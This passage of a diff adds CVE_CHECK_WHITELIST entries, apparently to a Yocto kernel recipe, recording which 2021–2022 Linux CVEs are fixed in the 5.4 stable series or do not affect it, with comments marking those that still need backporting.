+CVE_CHECK_WHITELIST += "CVE-2021-4197"
+
+# cpe-stable-backport: Backported in 5.4.143
+CVE_CHECK_WHITELIST += "CVE-2021-42008"
+
+# cpe-stable-backport: Backported in 5.4.162
+CVE_CHECK_WHITELIST += "CVE-2021-4202"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-4203"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4204"
+
+# CVE-2021-4218 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.148
+CVE_CHECK_WHITELIST += "CVE-2021-42252"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-42327"
+
+# cpe-stable-backport: Backported in 5.4.158
+CVE_CHECK_WHITELIST += "CVE-2021-42739"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-43056"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-43057"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-43267"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-43389"
+
+# cpe-stable-backport: Backported in 5.4.164
+CVE_CHECK_WHITELIST += "CVE-2021-43975"
+
+# cpe-stable-backport: Backported in 5.4.174
+CVE_CHECK_WHITELIST += "CVE-2021-43976"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-44733"
+
+# cpe-stable-backport: Backported in 5.4.260
+CVE_CHECK_WHITELIST += "CVE-2021-44879"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2021-45095"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-45100"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-45402"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-45469"
+
+# fixed-version: only affects 5.13rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-45480"
+
+# cpe-stable-backport: Backported in 5.4.133
+CVE_CHECK_WHITELIST += "CVE-2021-45485"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-45486"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-45868"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46283"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2021-46904"
+
+# fixed-version: only affects 5.12rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46905"
+
+# cpe-stable-backport: Backported in 5.4.127
+CVE_CHECK_WHITELIST += "CVE-2021-46906"
+
+# CVE-2021-46908 needs backporting (fixed from 5.12rc8)
+
+# cpe-stable-backport: Backported in 5.4.114
+CVE_CHECK_WHITELIST += "CVE-2021-46909"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46910"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46911"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46912"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46913"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46914"
+
+# cpe-stable-backport: Backported in 5.4.114
+CVE_CHECK_WHITELIST += "CVE-2021-46915"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46916"
+
+# fixed-version: only affects 5.8rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46917"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46918"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46919"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46920"
+
+# cpe-stable-backport: Backported in 5.4.115
+CVE_CHECK_WHITELIST += "CVE-2021-46921"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46922"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46923"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46924"
+
+# CVE-2021-46925 needs backporting (fixed from 5.16rc8)
+
+# CVE-2021-46926 needs backporting (fixed from 5.16rc7)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46927"
+
+# CVE-2021-46928 needs backporting (fixed from 5.16rc7)
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46929"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46930"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46931"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46932"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46933"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46934"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46935"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46936"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46937"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46938"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46939"
+
+# fixed-version: only affects 5.10rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46940"
+
+# CVE-2021-46941 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46942"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46943"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46944"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46945"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46947"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46948"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46949"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46950"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46951"
+
+# CVE-2021-46952 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46953"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46954"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46955"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46956"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46957"
+
+# fixed-version: only affects 5.7rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46958"
+
+# CVE-2021-46959 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46960"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46961"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46962"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46963"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46964"
+
+# CVE-2021-46965 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46966"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46967"
+
+# fixed-version: only affects 5.10rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46968"
+
+# CVE-2021-46969 needs backporting (fixed from 5.13rc1)
+
+# CVE-2021-46970 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.117
+CVE_CHECK_WHITELIST += "CVE-2021-46971"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46972"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46973"
+
+# cpe-stable-backport: Backported in 5.4.117
+CVE_CHECK_WHITELIST += "CVE-2021-46974"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46976"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46977"
+
+# fixed-version: only affects 5.11rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46978"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46979"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46980"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46981"
+
+# CVE-2021-46982 needs backporting (fixed from 5.13rc2)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46983"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46984"
+
+# fixed-version: only affects 5.12rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46985"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46986"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46987"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46988"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46989"
+
+# fixed-version: only affects 5.10rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46990"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46991"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46992"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46993"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46994"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46995"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46996"
+
+# fixed-version: only affects 5.10rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46997"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-46998"
+
+# fixed-version: only affects 5.7rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46999"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47000"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47001"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47002"
+
+# fixed-version: only affects 5.11 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47003"
+
+# CVE-2021-47004 needs backporting (fixed from 5.13rc1)
+
+# CVE-2021-47005 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-47006"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47007"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47008"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47009"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47010"
+
+# fixed-version: only affects 5.11rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47011"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47012"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47013"
+
+# fixed-version: only affects 5.8rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47014"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47015"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47016"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47017"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47018"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47019"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47020"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47021"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47022"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47023"
+
+# CVE-2021-47024 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47025"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47026"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47027"
+
+# CVE-2021-47028 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47029"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47030"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47031"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47032"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47033"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47034"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47035"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47036"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47037"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47038"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47039"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47040"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47041"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47042"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47043"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47044"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47045"
+
+# CVE-2021-47046 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47047"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47048"
+
+# CVE-2021-47049 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47050"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47051"
+
+# CVE-2021-47052 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47053"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47054"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47055"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47056"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47057"
+
+# fixed-version: only affects 5.11rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47058"
+
+# CVE-2021-47059 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.9rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47060"
+
+# fixed-version: only affects 5.9rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47061"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47062"
+
+# CVE-2021-47063 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47064"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-47065"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47066"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47067"
+
+# fixed-version: only affects 5.12rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47068"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47069"
+
+# CVE-2021-47070 needs backporting (fixed from 5.13rc3)
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-47071"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47072"
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-47073"
+
+# CVE-2021-47074 needs backporting (fixed from 5.13rc3)
+
+# CVE-2021-47075 needs backporting (fixed from 5.13rc3)
+
+# CVE-2021-47076 needs backporting (fixed from 5.13rc3)
+
+# CVE-2021-47077 needs backporting (fixed from 5.13rc3)
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-47078"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47079"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47080"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47081"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2021-47082"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47083"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47086"
+
+# fixed-version: only affects 5.14rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47087"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47088"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47089"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47090"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47091"
+
+# fixed-version: only affects 5.15rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47092"
+
+# fixed-version: only affects 5.9 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47093"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47094"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47095"
+
+# fixed-version: only affects 5.15rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47096"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47097"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47098"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47099"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-47100"
+
+# CVE-2021-47101 needs backporting (fixed from 5.16rc7)
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47102"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2021-47103"
+
+# fixed-version: only affects 5.15 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47104"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47105"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47106"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47107"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47108"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47109"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47110"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47111"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47112"
+
+# CVE-2021-47113 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47114"
+
+# CVE-2021-47116 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47117"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47118"
+
+# CVE-2021-47119 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47120"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47121"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47122"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47123"
+
+# CVE-2021-47124 needs backporting (fixed from 5.13rc2)
+
+# CVE-2021-47125 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47126"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47127"
+
+# CVE-2021-47128 needs backporting (fixed from 5.13rc5)
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-47129"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47130"
+
+# CVE-2021-47131 needs backporting (fixed from 5.13rc5)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47132"
+
+# CVE-2021-47133 needs backporting (fixed from 5.13rc5)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47134"
+
+# CVE-2021-47135 needs backporting (fixed from 5.13rc5)
+
+# CVE-2021-47136 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47137"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47138"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47139"
+
+# CVE-2021-47140 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47141"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47142"
+
+# CVE-2021-47143 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47144"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47145"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47146"
+
+# CVE-2021-47147 needs backporting (fixed from 5.13rc4)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47148"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47149"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47150"
+
+# CVE-2021-47151 needs backporting (fixed from 5.13rc4)
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47152"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47153"
+
+# CVE-2021-47158 needs backporting (fixed from 5.13rc4)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47159"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47160"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47161"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47162"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47163"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47164"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47165"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47166"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47167"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47168"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47169"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47170"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47171"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47172"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47173"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47174"
+
+# CVE-2021-47175 needs backporting (fixed from 5.13rc4)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47176"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47177"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-47178"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-47179"
+
+# cpe-stable-backport: Backported in 5.4.123
+CVE_CHECK_WHITELIST += "CVE-2021-47180"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-0001"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-0002"
+
